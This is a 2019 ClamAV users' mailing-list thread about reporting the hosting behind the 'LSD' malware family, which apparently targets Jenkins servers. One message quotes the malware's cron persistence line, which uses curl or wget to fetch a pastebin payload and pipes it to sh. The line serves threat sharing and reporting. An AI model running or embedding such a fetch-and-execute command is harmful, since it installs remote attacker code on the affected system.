[clamav-users] LSD Malwares

Joel Esler (jesler) jesler at cisco.com
Fri Apr 26 16:47:51 UTC 2019


Dear ClamAV-users,

I reached out to my contacts at Cloudflare to take action.


--
Joel Esler
Manager, Communities Division
Cisco Talos Intelligence Group
http://www.talosintelligence.com

On Apr 25, 2019, at 11:25 PM, Xavier Maysonnave via clamav-users <clamav-users at lists.clamav.net> wrote:

Hi All,

Thanks for your feedback.
I'm going to report to Cloudflare this URL.

However, keep in mind that there are other URLs that are involved in this family.
*/10 * * * * (curl -fsSL https://pastebin.com/raw/wR3ETdbi||wget -q -O- https://pastebin.com/raw/wR3ETdbi)|sh
This one targets Jenkins, another popular open-source tool, not used on our infrastructure though.

I'm still very interested in the consequences of this malware. Any hints will be greatly appreciated.

Thanks.

Light

Pudhuveedu / Xavier

PGP Fingerprint: CAE5 CE4A EFE9 134F D991 5465 081C B6FB 2EAC 6CC9 <http://keyserver.ubuntu.com/pks/lookup?op=get&search=0x081CB6FB2EAC6CC9>


On Fri, Apr 26, 2019 at 08:03, Dave Warren via clamav-users <clamav-users at lists.clamav.net> wrote:
The same applies: Report it. Cloudflare will either forward the
complaint for you, or block the offending URL (or both).

On 2019-04-25 19:16, Dennis Peterson wrote:
> That domain is hosted on a Cloudflare IP block. They've become part of
> the problem.
>
> dp
>
> On 4/25/19 7:52 AM, J.R. via clamav-users wrote:
>> Perhaps it would also be worthwhile to report dd.heheda.tk to their
>> hosting provider & domain registrar that they are hosting malware and
>> get that site shut down...
>>

_______________________________________________

clamav-users mailing list
clamav-users at lists.clamav.net
https://lists.clamav.net/mailman/listinfo/clamav-users


Help us build a comprehensive ClamAV guide:
https://github.com/vrtadmin/clamav-faq

http://www.clamav.net/contact.html#ml
